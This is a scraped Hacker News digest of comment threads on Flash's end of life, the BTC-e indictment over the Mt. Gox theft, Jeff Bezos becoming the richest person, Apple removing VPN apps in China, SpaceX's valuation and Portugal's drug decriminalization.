zwetan 5 days ago 0 replies      
What about petitioning Google to open source Swiffy?

To me, Google Chrome is the one responsible for killing Flash; Adobe is just playing catch-up.

jaimex2 5 days ago 0 replies      
Big star from me.

I never understood the hate Flash got; sure, it was abused by ads, but to this date I have never seen the same level of animated and vibrant websites that were around at its peak.

Everything is the same old bootstrapped template now; it's pretty boring.

rhabarba 4 days ago 0 replies      
Where can I sign a petition to let Javascript die before 2020?
kahlonel 5 days ago 0 replies      
I would do anything to preserve those white buttons with glowy green borders.
odammit 5 days ago 0 replies      
I would love to see what kind of Simcities are in that source code
adaml2017 5 days ago 0 replies      
Yes! Great idea. Also, a quick observation: Flash is so hard to get rid of because it's still a very useful tool. We're lucky to have had it in the 2000s.
cgb223 5 days ago 0 replies      
There are a ton of Black Hat hackers who would love to see this petition become real

Shut it down, the internet is massively more secure without flash

prodikl 5 days ago 1 reply      
ActionScript is still loved by the Starling community. I don't really think I'll miss the swf format, though.
yuhong 5 days ago 0 replies      
This will probably take years of course. Hopefully the H.264 patents will expire at least not long afterwards.
dhosek 5 days ago 1 reply      
How about a petition to have Adobe put code into all versions of Flash going forward that disables the Flash player on the EOL date, so that the danger of security vulnerabilities from the damn thing will be greatly reduced.
xilni 5 days ago 3 replies      
Dear god no, please just let it die, I don't care about Badger, Badger, snake or Flash hentai flash game nostalgia that much.
dim13 5 days ago 0 replies      
Let it go gracefully.
rbanffy 5 days ago 0 replies      
Please, let it die.
covamalia 5 days ago 0 replies      
Just let it die!
c4ncri 5 days ago 1 reply      
Let Flash die. We don't need it. We've got HTML5.
imagetic 5 days ago 0 replies      
Let it die.
ram_rar 5 days ago 0 replies      
It's already open sourced. It's called HTML5!
bricss 5 days ago 0 replies      
Burn it to hell
sureste 5 days ago 0 replies      
I support this. In 20 years when no one is using it anymore and the source code is released for academic purposes.
CrankyBear 5 days ago 1 reply      
Really? Really!? All the years we've suffered with this, this insecure thing, and you want to give it eternal life in open source? Not just no, but hell no. You want video? Use HTML5's Theora, H264, or WebM.
jayflux 5 days ago 1 reply      
Even if this did happen, I doubt browsers would support it (as already mentioned). If nostalgia is the problem, it would be far less effort to recompile those games into HTML5.
omarforgotpwd 5 days ago 0 replies      
Yikes. How about a petition to burn it with fire? Petition to erase all mention of flash from history books?
mtgx 5 days ago 8 replies      
Isn't Flash player's code super-messy by now? (a hint towards that could be all the vulnerabilities found for it every week). Open sourcing it would have to dramatically improve the code quality and in a relatively short period of time (2 years max), otherwise browser vendors would never go along with it (nor should they).

Sounds like a daunting task, especially if no big organization/leader takes up the task of cleaning it up, the way OpenBSD did with LibreSSL.

BTC-e and its founder charged in 21-count indictment over hack of Mt. Gox justice.gov
457 points by ryanlol  5 days ago   243 comments top 21
openmosix 5 days ago 13 replies      
The question for me is: why the US? He is a Russian citizen, the company is based in Bulgaria, servers in Russia, legal HQ in Cyprus and all the services operated from Seychelles; he was arrested in Greece. The MtGox hack affected a Japanese company. I'm not debating the nature of the crimes, etc. - I am just wondering, when does it become a US case?

I can get the "there were US customers" - but why not Europe? Or Japan? Or Russia? Or Australia? I'm sure BTC-e had customers from all over the world (and money laundering is pretty much a crime everywhere).

So, when does it become "you have broken US law and you are under arrest"? Does it work the other way around too? If you start a gay social network in the US, can Russia come in (the first time you are flying through one of Russia's partners' territories) and say "you are breaking Russian gay laws, you are under arrest"?

mrb 5 days ago 3 replies      
BTC-E has been seen by the Bitcoin community as "shady" for years. People have always recommended that others avoid using it. It was rumored to be an easy place to sell stolen Bitcoins. It has always offered strangely convoluted pathways to transfer fiat to financial institutions (see http://bitcoinworldwide.net/how-to-deposit-money-into-btc-e). I'm glad BTC-E finally got taken down. I am not surprised it was involved in illegal activities. One less shady Bitcoin company.

Now the top 12 or so volume-ranked Bitcoin exchanges listed at https://cryptowat.ch are perfectly legitimate trustworthy companies. The ones I'm not sure about are CEX.IO and Luno (not saying they aren't trustworthy, I just don't know them that well) and, well, Bitsquare which as a decentralized exchange is bound to have some shady participants.

lettergram 5 days ago 12 replies      
I still don't understand, the U.S. is charging a Russian with a white collar crime?

The crime was committed outside the U.S., he didn't come to the U.S., the servers weren't in the U.S., Mt.Gox was based out of Japan, and Greek police arrested him.

I've seen this enough to know this is common, but what is going on with this world?

Dolores12 5 days ago 6 replies      
1) Arresting the btc-e admin made all US customers lose their balances on the btc-e exchange. I highly doubt btc-e will come back online.

2) If you run an online exchange and have a single US customer, then you have to register your operation in the USA. I find that ridiculously stupid.

disillusioned 5 days ago 2 replies      
An interesting comment validated here, from 7 years ago:
mirimir 5 days ago 1 reply      
Interesting. Bitcoin stolen from Sheep Marketplace also ended up in a BTC-E account.
atmosx 5 days ago 0 replies      
I would like to know how he was arrested in Greece. Was there an Interpol warrant or something, or did they just make a phone call and the Greek authorities promptly put the guy on a ship to the US?
grandalf 5 days ago 1 reply      
This illustrates how the DOJ is years behind when it comes to understanding cryptocurrency technology and markets.

It won't take long for one of the cryptocurrencies with private transactions to rise in dominance, since this sort of crackdown imposes costs and uncertainty on all participants.

If the goal of the DOJ was to fight crime, the most effective approach would have been simply to infiltrate mixers and trace money flows relevant to investigations, something BTC is perfect for.

Instead, this move sends a strong signal to the cryptocurrency community that hardening measures are needed.

For instance: http://zerocoin.org/
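
The "infiltrate mixers and trace money flows" approach this comment describes is, at bottom, a graph traversal over a public ledger. A toy sketch, with every address and edge invented for illustration (real tracing would build the graph from actual transaction outputs, and mixers muddy it by pooling many users' coins):

```python
from collections import deque

# Toy transaction graph: address -> addresses it sent coins to.
# All addresses and edges here are made up for illustration.
tx_graph = {
    "addr_hack": ["addr_mixer1", "addr_mixer2"],
    "addr_mixer1": ["addr_exchange"],
    "addr_mixer2": ["addr_exchange", "addr_cold"],
    "addr_exchange": [],
    "addr_cold": [],
}

def trace(start, graph):
    """Breadth-first walk of everywhere funds from `start` could have moved."""
    seen, queue = {start}, deque([start])
    while queue:
        addr = queue.popleft()
        for nxt in graph.get(addr, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen

print(sorted(trace("addr_hack", tx_graph)))
# → ['addr_cold', 'addr_exchange', 'addr_hack', 'addr_mixer1', 'addr_mixer2']
```

This transparency of Bitcoin's ledger is exactly why privacy-focused designs like Zerocoin exist: they break the edges the traversal relies on.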

ue_ 5 days ago 3 replies      
Interesting, I have been using BTC-E for a while, I had no idea this sort of thing happened. Was it knowingly assisted by someone at BTC-E, or did BTC-E just act as a dumb machine?

BTC-E was one of the easiest ways for me to exchange BTC and LTC in day trading. Are there comparable websites with small fees? I'm not interested in buying with fiat money.

RachelF 5 days ago 0 replies      
An interesting analysis of the evidence here:

Breaking open the MtGox case, part 1 http://blog.wizsec.jp/2017/07/breaking-open-mtgox-1.html

techaddict009 5 days ago 1 reply      
The question is: who has control over BTC-e's crypto? Will the coins be returned to users?
aarongolliver 5 days ago 0 replies      
The website still says "down for unscheduled maintenance"
ryanlol 5 days ago 4 replies      
There's been no mentions of coin seizures anywhere as far as I can tell. Usually you'd see some boasting about that.

Perhaps these guys were actually smart about their cold storage?

agorabinary 5 days ago 1 reply      
>The takedown of this large virtual currency exchange

I haven't kept up to date on exchange volume. Was btc-e still a popular exchange (up until this takedown of course)?

stepik777 5 days ago 0 replies      
They are boasting about how they caught the guy who robbed Mt. Gox but they just did the same - a lot of people just lost access to their money on BTC-e. They are not all criminals, BTC-e was a convenient way to exchange bitcoins to/from rubles and was used by many people in Russia who were interested in cryptocurrencies.
baby 5 days ago 0 replies      
I am so happy right now that I moved my litecoins from btc-e to a personal wallet. I've learned my lesson.
SwellJoe 5 days ago 2 replies      
So, does that mean I can't get the BTC I deposited in BTC-e ages ago? I somehow didn't even know any of this was going down. (I have no idea how much it was...maybe a quarter of a coin, which is a reasonable amount of money today.)
bigbrooklyn 5 days ago 0 replies      
gruez 5 days ago 3 replies      
>Russian National And Bitcoin Exchange

So nothing will happen to the site or its owner, other than maybe they won't be able to transfer out USD.

mikob 5 days ago 2 replies      
Although I don't understand the US's involvement in this, a man breaking the rules is being brought to justice, and I'm very glad. I'm also impressed by the feds' work in the cryptocurrency space. In recent years the feds have really started to reverse the trope of the government not being technologically adept. There are too many who become wealthy through illicit means, and it's good news that something effective is being done about it.
sjreese 5 days ago 0 replies      
Where is the FBI in this? It was a FBI black op against silk road -> follow the money! Who was silk road's bank < Mt Gox - Who bankrupt Mt Gox < FBI Who had access to Trademill database < FBI Who authorized the attack on BitCoin after saying don't use it's not safe < FBI Today the seizure of all BitCoin in BTC-e is done by the FBI - Hopefully the number of FBI SA's going to jail over this Black Op will be limited. But, their greed is transnational to hide their seizure of overseas assets.. that is, What was seized and who accounted for it! Think DrugWar - we will be looking for SA's living beyond their means as with silk road
Jeff Bezos Surpasses Bill Gates as World's Richest Person bloomberg.com
461 points by fargo  5 days ago   405 comments top 35
kens 4 days ago 16 replies      
I think most people don't realize just how much money the richest people have. People generally think of normal(ish) distributions like height, where if you're 10% taller or shorter than average, you're a tall or short person, and 40% taller makes you the tallest person in the world. In comparison, wealth has a very, very long tail, making it hard to comprehend.

Here's what I've come up with to visualize wealth in the United States. Suppose you start counting, going up by 1 million dollars every second, and people sit down when you reach their net worth. Most people will sit down immediately. After about 9 seconds, people in the "1%" will start sitting down. Near the 17 minute mark, billionaires would start sitting down. Donald Trump would sit down just before the hour mark. A day later - an hour and 10 minutes into the second day of billionaires sitting down - Bill Gates would sit, followed by Jeff Bezos just three minutes later.

The point of this is there's a huge range of billionaires (analogous to comparing 17 minutes to a day). The 1% hardly even registers on this scale (a few seconds). (I should also mention that there should be huge error bars on reported net worth numbers.)
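
The counting exercise above works out as follows; the net-worth figures in the script are rough mid-2017 estimates, assumed here for illustration:

```python
# Counting $1,000,000 per second, how long until each net worth is reached?
RATE = 1_000_000  # dollars counted per second

net_worths = [
    ("Entry to the US 1% (household)", 8e6),
    ("A fresh billionaire", 1e9),
    ("Donald Trump", 3.5e9),
    ("Bill Gates", 90.6e9),
    ("Jeff Bezos", 90.8e9),
]

for name, worth in net_worths:
    seconds = worth / RATE
    days, rem = divmod(seconds, 86_400)
    hours, rem = divmod(rem, 3_600)
    minutes = rem / 60
    print(f"{name}: {int(days)}d {int(hours)}h {minutes:.0f}m ({seconds:,.0f}s)")
# e.g. "Bill Gates: 1d 1h 10m (90,600s)"
```

A new billionaire sits at about 17 minutes, Trump just shy of the hour, and Gates and Bezos a day and change later, a few minutes apart.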

vanderZwan 5 days ago 7 replies      
Hasn't Bill Gates mostly been focused on spending his fortune as effectively as he can on philanthropy for the last decade or so? In that light it's more amazing it took that long.
Verdex_2 5 days ago 4 replies      
_Codemonkeyism 5 days ago 5 replies      
I was one of the guys writing "M$" and annoyed by the shady business practices of Gates.

Today he has my utter respect for how he transformed and how he spent his money.

m12k 5 days ago 6 replies      
Officially at least - there is a chance that Putin is actually the richest person in the world: https://www.theatlantic.com/politics/archive/2017/07/bill-br...

"He wasnt saying 50 percent for the Russian government or the presidential administration of Russia, but 50 percent for Vladimir Putin personally. From that moment on, Putin became the biggest oligarch in Russia and the richest man in the world, and my anti-corruption activities would no longer be tolerated."

Dirlewanger 5 days ago 3 replies      
So when do we think Bezos will go on the typical billionaire philanthropy track? Actually, a better question is probably will he even? At Bezos' age, Gates was already in a backseat role with most of his non-philanthropic ventures. Though he shares some similarities with Gates, he shows no signs of stopping. He seems actually content with Amazon eating the world, and I don't think it will be a net positive for humanity.
JustAnotherPat 5 days ago 1 reply      
I wonder at what point the world's richest will no longer include those philanthropically inclined like Buffet, Gates, and Bloomberg and will be dominated by the likes of Bezos, Slim, and Ortega. (The jury is still out on Zuckerberg and his dubious initiatives)

Our global economy is trending towards benefiting only the most ruthless, even at the very top.

throwaway328832 4 days ago 0 replies      
Money frankly is irrelevant beyond a certain point (and most of it is in the form of share holdings anyway).

I'd be more worried about the power/political influence these individuals wield. There is generally an incestuous coterie of the rich that one gets access to after a certain point, where the destruction of freedom is lubricated with champagne and caviar. Bilderberg/IMF/WTO/G20 etc. are symptomatic of such cabals of corporatocracies and their retainers in the state apparatus that wield power over the world.

DannyB2 5 days ago 3 replies      
This probably does not change Bill Gates' enjoyment of day to day life, or lack thereof, whatever the case may be. It depends on whether Bill Gates is obsessed by these kinds of facts, or whether he can enjoy life without a tiny hand size measuring contest.
nolok 5 days ago 0 replies      
I can't entirely decide if I find that graph [1] more impressive or terrifying. Look at the time scale and the speed at which Bezos' net worth increased, while starting at the already insane point of $30B.

[1] https://assets.bwbx.io/images/users/iqjWHBFdfxIU/iVJAUVVd7l0...

bvm 5 days ago 5 replies      
Is there a measure of the most fully liquid richest person? i.e. the individual that holds the most cash.
shimon_e 5 days ago 2 replies      
Somewhere there is a community of retailers that hates Amazon as much as Slashdotters hated Microsoft.
neiled 5 days ago 2 replies      
I was surprised by this. Anyone know the levels of philanthropy of Bezos vs Gates? I've read many times of the great work and resources (money and otherwise) that Mr Gates has contributed to many causes.
losteverything 4 days ago 0 replies      
From the article" Anyone who joins Prime shops in retail stores 10 percent less, and that number will keep accelerating as Amazon adds more inventory.

I'd love to know the analysis on this.

I deliver to amazon addicts and prime-ers. Although, yes, they order often (5-6 days a week) the volume of items by count is tiny compared to a shopping cart at a store.

droidist2 5 days ago 0 replies      
Damn it, why did I sell half my Jeff Bezos stock
VMG 5 days ago 0 replies      
Prime Day paid off it seems
arsenal 4 days ago 0 replies      
How much of that money is he actually giving away to uplift other people? A lot to catch up on Bill Gates there
jcmoscon 4 days ago 0 replies      
So to understand how much money he has, let's say Jeff Bezos is walking down the street and sees US$42,000 lying on the ground. He is so rich that it's not worth it for him to stop and pick up the money. It's like you or me seeing a 10-cent coin on the ground. That's his life.
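The analogy above can be checked with back-of-the-envelope arithmetic. A sketch; the ~$90B Bezos figure and the ~$97k US median household net worth are both assumed values, not from the thread.

```python
# Scale a dime for a median household up to Bezos's net worth.
# Both dollar figures are rough assumptions for illustration.
bezos_net_worth = 90e9       # rough mid-2017 estimate
median_net_worth = 97_300    # assumed US median household net worth
dime = 0.10

equivalent = dime * bezos_net_worth / median_net_worth
print(f"A dime to a median household is like ${equivalent:,.0f} to Bezos")
```

Under these assumptions a dime scales to roughly $90,000, so the $42,000 figure in the comment is, if anything, conservative.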
krapp 5 days ago 2 replies      
Just imagine the quality of head wax he can afford now.
0xbear 4 days ago 0 replies      
BillG has been giving away something like $2B a year for the past 15 years. He's not really holding onto the title very much.
gpawl 4 days ago 0 replies      
Only on a technicality, because Gates's net worth doesn't include money in the foundation that Gates controls.
odiroot 5 days ago 0 replies      
I wonder what his security detail looks like.
pavlakoos 5 days ago 0 replies      
Well deserved, I'm afraid.
4010dell 4 days ago 0 replies      
OK, thanks for the info. Now I can spend the rest of my day miserably.
dluan 5 days ago 0 replies      
Something in the water in Seattle
swehner 5 days ago 0 replies      
You guys haven't been keeping up the boycott, have you?!
advertising 5 days ago 0 replies      
Except it's Putin
miguelrochefort 5 days ago 1 reply      
I call 100 billion by 2019.
_pmf_ 5 days ago 0 replies      
Best paid CIA operative.
dumbfounder 5 days ago 0 replies      
Congrats dude, well earned. I expect him to put some serious space between him and rest of the pack in the next 10 years.
kooky5489 5 days ago 0 replies      
It should be Elon Musk!! He is the ultra billionaire we deserve...
bmcusick 5 days ago 4 replies      
This is wonderful news for humanity, in the long term. Bezos is dedicated to expanding humanity into the solar system in a more sensible way than Musk is. O'Neill cylinders are really the way to go for a lot of reasons, and that's the vision that Bezos is dedicated to. More money for that is fantastic.

I just wish there was a Bezos/Gates-level billionaire who cared as much about life extension via SENS. That's the only thing of equal importance I can think of that needs long term vision and financial support.

Tomis02 4 days ago 0 replies      
Kind of surprised to see this so upvoted, I was under the impression that "top N richest people" articles only impress kids and the immature. Don't have a source for it but I'm pretty sure people with more than a few hundred million in the bank couldn't care less if they're richer or poorer than someone else, as they haven't made their fortune by worrying about frivolous things. But that's just me.
efficax 5 days ago 3 replies      
I find it weird to report on this like it's a race or competition. His net worth bump right now is entirely due to rash market speculation and the recent tech bubble. When the crash comes (and it will), AMZN could easily be down to $500 in a week, and he'll just be insanely rich again.
Apple Removes Apps from China Store That Help Internet Users Evade Censorship nytimes.com
430 points by mcone  3 days ago   420 comments top 44
coldcode 3 days ago 17 replies      
You cannot do business in China without doing what they tell you. Period. Either you do it or you leave. I work for a big company (you would all know) and we have a large business unit in China, they own 52% of it. They decide what goes in and how customers can use it. We don't get to decide anything without government approval. It's so easy to claim the West shouldn't do what the leadership of China wants in China, but in reality the only alternative is to abandon China to those who will do what they are ordered to. The market is too large to leave. If you don't agree to their rules you don't play in their sandbox.
janandonly 3 days ago 10 replies      
What happens in China now could happen in 5 years in the rest of the world.

For "security" reasons or "fight agains terrorism", while it's really a fight between those in power and those who want power :-(

The need for IPFS, webRTC and other non-centralized protocols becomes more pressing every day, to defend everyone who is stuck in between.

pipio21 3 days ago 5 replies      
Just common sense, given that the Chinese government has made usage of VPNs illegal.

What do you expect?

People in China could continue using app store accounts created in other countries as usual.

And most educated people continue using VPNs too. Normal people are becoming experts in encryption, security...

It worries me more that countries like the UK and the US want to follow China, in that order.

bobjordan 2 days ago 0 replies      
My business has an AWS China account and below is the email I received on Friday. It is definitely a crackdown year, on several fronts even other than the internet. Like this year I was forced to pay a $300 fine because I didn't report to the police station within 24 hours of re-entry while living in my own leased home. Now, my company is not huge but I've employed 100+ people and we pay a lot of taxes, social insurance, provide jobs for local families. They do not give a shit about that: you will follow the laws of China to do business here or you will be thrown out.

Overall, this year has really chilled my enthusiasm for getting too comfortable with the thought of living here the rest of my working life. In this age with so many elite Chinese being trained and educated abroad, it is really hard to believe things are going in this direction. I mean, IT is already hard enough: we need a server in our office that is connected to another server in France, and we need it reliable and without issue. Making this type of stuff even harder on us as a business is really irritating. I really do tell myself every day "if it was easy everybody would be doing it".

"Dear Customer, According to the telecom regulations and the requirement of MIIT/MPS and Internet supervision agency, please check up two parts below. The illegal over the wall proxy sites and provide hosting campaign service for illegal over the wall proxy sites.All main domains which dont have ICP recorded number via MIIT and All websites which have illegal content. We will continuously receive notification from the regulators to close such services or shut down server deployment immediately. In case your will be involved in any consequences of such violation, please stop immediately if you have such illegal services and deployment. Thanks for your understanding and cooperation.

Regards,AWS China (Beijing) Region operated by SINNET"

adamnemecek 3 days ago 1 reply      
Hey Timmy, what was all that talk about customer security?


And here I was, almost believing you.

Tepix 3 days ago 1 reply      
You don't need their closed app store. Free workaround:

apply for a free Apple developer account,

compile your own copy of https://github.com/mtigas/OnionBrowser or https://github.com/yuyao110120/ShadowVPN-iOS and

install it on your own iDevice

abecedarius 3 days ago 2 replies      
If you build in the ability to censor, you can't disclaim responsibility when a state makes you do it. We'll see the same sort of thing in Russia, the UK, and so on. Apple can still act, if they wish, by not locking down their users. I know that'd be a big step for them.
libeclipse 3 days ago 2 replies      
What a despicable joke of a country. And shame on Apple for aiding them while they made such a massive deal of user rights in the US.
saurik 3 days ago 1 reply      
They also require a paid developer subscription to get access to the Network Extensions capability (needed to build a VPN protocol extension) in order to make sure people who develop these apps can't just provide IPA files for normal users in China to "sideload" using tools such as my Cydia Impactor.
mauvehaus 3 days ago 4 replies      
This from the company that removed the headphone jack from their phones while crowing about the "courage" involved in making the decision.

I'm not going to pretend to believe that Tim Cook's letter (cited elsewhere) was much more than a PR move in a country where they were unlikely to face any substantial consequences for (at least publicly) standing up to the government, or that I really believe that corporations have a responsibility to protect basic human rights (though it would be nice if they did). Still, it'd be nice if corporations didn't try to have it both ways: maintaining an image as a courageous force for good when it was convenient while washing their hands of responsibility for any actual action when it became difficult.

nsxwolf 3 days ago 1 reply      
Why hasn't iMessage been blocked in China? Does Apple run a special compromised version of it there, or has China simply not made banning it a priority yet, or is iMessage simply not as secure as we have been told?
maxxxxx 3 days ago 3 replies      
That's why corporations will never help against dictatorship. They may do it if it's convenient but in the end they will prioritize money over everything else and fall in line with dictatorships. Happened during the Nazi time, it's happening in China now.
imron 3 days ago 1 reply      
Alternative title:

Apple complies with law in countries where it operates.

mnm1 2 days ago 0 replies      
The entire Apple platform is designed to restrict the user and prevent anything that Apple doesn't want to happen from happening. This is Apple's decision only, and it's in line with all their other decisions that restrict a user's freedom on their closed, non-free platform. If people wanted a platform that would run whatever software they wanted without restrictions, they shouldn't have bought Apple, period. It's just dumb to expect a closed, non-free platform that censors by default to suddenly do a 180 and become free. But hey, it's not like people haven't been saying this for decades now, is it? Oh right, people like RMS have, but most consumers are too stupid to listen. This is the outcome.
saimiam 2 days ago 2 replies      
I see a lot of very cogent arguments defending Apple as only following the law when it comes to VPN laws of China.

I'm not old enough to know this first hand but I believe the anti-apartheid movement against South Africa was started by students and spread to the corporate world before world governments stepped up to ban doing business with South Africa.

This seems to be a specific example of corporate advocacy leading governmental policy.

If the Chinese government's rule over the Chinese people is so egregious to the world, I think Apple would be on solid ground if they refused to do business in China and also refused to do business with Chinese companies outside China.

skybrian 3 days ago 0 replies      
They probably had to do it to keep the official store available in China, but this is why supporting side-loading of apps like Android does would be a good idea.
humanrebar 3 days ago 2 replies      
At what point does Apple itself bear some responsibility for censoring people?

EDIT: Would downvoters please explain their objection to the question? "Apple isn't to blame" and some thoughtful elaboration would be better than just downvoting.

bigtoine123 3 days ago 1 reply      
This is horrible, but in England and America, I'm 100% certain that similar policies will be applied - in the name of law, and public security.
vkou 2 days ago 0 replies      
Isn't it wonderful that the iPhone is a walled garden, and with the flick of a switch, an entire category of software cannot be run on it?

The fact that this switch exists is the real tragedy here - not the fact that Apple chose to use it.

drefgert 3 days ago 0 replies      
Tech companies must play a long political game and spend their vast fortunes to lobby, to own media and influence policy and control the message.

Once they do this they will no longer be in conflict with governments and their policy.

Take note in coming years as the tech barons buy up media to control the message.

They will of course do this and then the real problem will not be uppity governments but mega tech corporations who semi covertly run the world.

retox 3 days ago 0 replies      
Profits before people, the Apple motto.
dmritard96 1 day ago 0 replies      
I always wonder about Hong Kong now that it is under the one country two systems - basically, I wonder if internet censorship will be lessened before HK internet openness disappears.
baozilaile 2 days ago 0 replies      
To all in HN:

There is a huge market in helping people in China break through the GFW (Great Firewall). You can start a startup for that :)

Crontab 3 days ago 1 reply      
This is awful, but in England and America, I foresee similar policies will come - in the name of law, safety, and security.
perfectstorm 2 days ago 0 replies      
Doesn't the iPhone support native VPN configuration in Settings? How are they going to prevent users from using that? It's not as easy as downloading a dedicated app and logging in, but using the Settings app is not much work.
belltaco 3 days ago 0 replies      
But with Windows/Linux it's still possible to install apps on your own, unlike the locked down app store.
oneplane 3 days ago 0 replies      
It's not very surprising considering that it's the local law and everyone will have to follow it or get out...

It isn't going to actually prevent anyone from tunneling past the great firewall of course, so it's more like a gesture than an actual effective decision from the government.

samcat116 2 days ago 1 reply      
I assume they are still allowing manual VPN configurations right? They are only removing apps that configure it automatically for you. Not downplaying the impact of this, just clarifying.
sipCom19 3 days ago 1 reply      
Apple is free to do what it wants, I'm free not to buy their stuff.
secfirstmd 3 days ago 0 replies      
Terrible news.

So let's start tackling the problem and figuring out ways to help the average Chinese person evade censorship without developer accounts and the knowledge to compile...

csomar 2 days ago 0 replies      
Apple tailors to countries. They made an iOS without FaceTime for Dubai specifically.

It's a good thing, however, that they are fighting for privacy where they can.

shpx 3 days ago 0 replies      
Stallman was right.
pmarreck 3 days ago 1 reply      
Perhaps some free-speech provision should be part of the Universal Declaration of Human Rights
ComodoHacker 2 days ago 0 replies      
Russia is next. They just have passed a law to ban VPNs and anonymous proxies.
gigatexal 3 days ago 0 replies      
I wonder what Orwell would have thought of modern China.
joseph4521 3 days ago 4 replies      
Seems that Apple is just following, with much delay, the law of People's Republic of China. I don't understand why some people think companies should be above the law.
allenleein 3 days ago 1 reply      
What would Steve Jobs do?
the_common_man 2 days ago 1 reply      
I find all this outrage about Apple not taking a stand highly amusing.

Practically every single product used in the western world is made in China. Please report back if you can get rid of all those products at a _personal_ level. For a start, looks like I have to throw this laptop away. Not going to happen.

microcolonel 3 days ago 1 reply      
Next China will outlaw Linux for having an IPSec implementation in it, lol. What a sad country that believes liberty comes after wealth, and in relative terms may never have either.
SpaceX Is Now One of the Worlds Most Valuable Privately Held Companies nytimes.com
421 points by iloveluce  4 days ago   293 comments top 24
loeg 4 days ago 11 replies      
> Mr. Musk faces competition from another billionaire. Blue Origin, a rocket company founded by Jeff Bezos, the chief executive of Amazon, aims to send tourists and supplies into space.

Is that line even close to true? Last I heard Blue Origin was years away from revenue and far behind SpaceX in terms of capability and manufacturing.

skinnymuch 4 days ago 1 reply      
Forbes seems to have always been wrong about Musk's net worth unless I'm missing how it works. By my estimations, now he should be worth around $23B. $11B from Tesla. $11.5B from SpaceX.

Obviously they haven't updated for this news yet, but they still won't be at $23B.

Regardless, going from having invested all his PayPal money by '08 and being in dire straits, to being worth $20B+ nine years later, is awesome. And depending on what narrative you believe, money to this degree isn't what he cares about anyway.

Kudos to Elon, SpaceX, and everyone working there.

strictnein 4 days ago 4 replies      
I mean, SpaceX is great and all, but it's not even in the same league as Cargill or other similar companies like Koch (which is #2 in the US):


 Revenue: US$109.6 billion (2017)
 Net income: US$2.835 billion (2017)
 Total assets: US$55.8 billion
 25% of all United States grain exports
 22% of the US domestic meat market

dbosch 4 days ago 3 replies      
"World's most valuable privately held companies".Sounds weird, no?

What about Vitol (https://en.wikipedia.org/wiki/Vitol), Saudi Aramco, Koch Industries (https://en.wikipedia.org/wiki/Koch_Industries) ... etc ?

gaius 4 days ago 5 replies      
It makes me sad that SpaceX, a company that actually invents and makes stuff, is mentioned alongside Uber, whose only product is evading taxes and regulations.
yellow_postit 4 days ago 1 reply      
As much as I'd love to invest I'm glad they're avoiding the short term outlook being publicly traded would demand.
Overtonwindow 4 days ago 3 replies      
The best thing Mr. Musk can do, in my humble opinion, is to never, ever take SpaceX public.
protomyth 4 days ago 2 replies      
Shouldn't the title include some qualifier like "tech company"? There are private companies like Cargill out there with yearly revenue above $20 billion.
martinmusio7 4 days ago 0 replies      
Thinking about it a bit more, I don't believe that Blue Origin and SpaceX are competitors. In a sense yes, but they will not fight for customers. I believe there is more than enough demand for both of their services.
NumberCruncher 4 days ago 1 reply      
And what about Basecamp with its 100 billion valuation?
omarforgotpwd 4 days ago 4 replies      
In what world is SpaceX valued at $20B while Uber is valued at $69B?
mxschumacher 4 days ago 0 replies      
No it is not. One of the most valuable private startups maybe.

Here's the top 15: https://en.wikipedia.org/wiki/List_of_largest_private_non-go...

fnord123 4 days ago 0 replies      
So what are the most valuable private companies? Ikea, Bloomberg, Dell, Koch, Cargill, Bechtel, most of the big 5 accountancy firms...

I'm not so sure SpaceX is "one of the world's most valuable privately held companies".

Animats 4 days ago 1 reply      
Space-X is, at long last, getting their launch rate up. 9 Falcon-9 launches so far this year. For a while, they had commercial customers canceling because they were way behind on their launch schedule. It's quantity of successful launches that makes money in that business.

Not much is happening at the Brownsville TX site, where Space-X still hasn't done much more than pile up dirt and wait for it to settle. They're building on beach sand. They really need that site so they can have more pad time.

JumpCrisscross 4 days ago 3 replies      
Excellent news, even if the round is peculiarly undersized. First time I've seen them be so coy with the identity of the investor, too.
skinnymuch 4 days ago 0 replies      
It's surprising how little money was taken in this round. You'd have expected something closer to $1B. I'm sure $350M will help enough, and it has been over 2 years since the last funding, so maybe it's fine. They can raise again soon if need be.

Especially with Bezos pumping $1B into Blue Origin a year.

martinmusio7 4 days ago 2 replies      
Bezos is coming .. already $1B a year from Amazon stock. And Amazon is more successful every year. I am very curious how things will go.
RikNieu 4 days ago 0 replies      
Is it just me or does it seem absurd that a company like Snap would have a comparable market valuation to SpaceX...
miheermunjal 4 days ago 0 replies      
as an engineer doing non-hardware engineering, it is always satisfying to watch SpaceX succeed from afar.
cli 4 days ago 3 replies      
Is a private company's value akin to a public one's market capitalization? How is this determined?
supernumerary 4 days ago 0 replies      
Gradatim Ferociter baby
bitxbitxbitcoin 4 days ago 0 replies      
No surprise there.
_pmf_ 4 days ago 1 reply      
Privately held, taxpayer funded, like most of Musk's endeavors.
14 Years After Decriminalizing Drugs, Portugals Bold Risk Paid Off mic.com
412 points by cirrus-clouds  3 days ago   127 comments top 17
lmickh 3 days ago 12 replies      
I find it misleading that almost all of the recent articles on this subject talk about decriminalization as the cause for the drop in drug-related health issues.

They shifted a significant chunk of money to health services. If it proves anything, it is only that health services can reduce drug related health issues. Without a control, there is nothing to point to regarding criminalization vs decriminalization. People are now paid to go out to drug dens and offer medical help. You can't simply say "people were scared to get help before" when instead you start sending help straight to their location.

Even when an article mentions the change in spending/focus, it is framed in the context of legalizing drugs. No one is making articles titled "After years of improving health services, Portugal's drug policy paid off".

I get that some folks want to legalize drugs, but make an argument for it that doesn't involve this twisting of results to match the desired outcome.

shawnee_ 3 days ago 2 replies      
Portugal's performance in perspective: Only three people for every million die of a drug overdose in Portugal, which puts one of the eurozone's poorest countries in a different league than rich international powerhouse Germany (17.6 per million) and in a different universe than social democratic utopia Sweden (69.7 per million).

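The per-million rates quoted above can be put side by side as ratios (numbers taken directly from the quoted article):

```python
# Overdose deaths per million, as quoted from the article above.
rates = {"Portugal": 3.0, "Germany": 17.6, "Sweden": 69.7}

for country, rate in rates.items():
    print(f"{country}: {rate / rates['Portugal']:.1f}x Portugal's rate")
```

That puts Germany at roughly 6x and Sweden at roughly 23x Portugal's rate.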
There's a fascinating documentary called American Addict on what nearly happened before this happened:

"In 1971 President Richard Nixon declared war on drugs. He proclaimed, Americas public enemy number one in the United States is drug abuse. In order to fight and defeat this enemy, it is necessary to wage a new, all-out offensive(Sharp, 1994, p.1). Nixon fought drug abuse on both the supply and demand fronts." [source]

Before criminalization, the trend in society was to start treating people who are afflicted with addictions like the sick people they are, rather than like criminals. There was an entire movement toward recovery as a necessary way of life for some people who cannot moderate alcohol intake (or drugs or whatever), just like insulin is a way of life for diabetics whose pancreases can't moderate insulin.

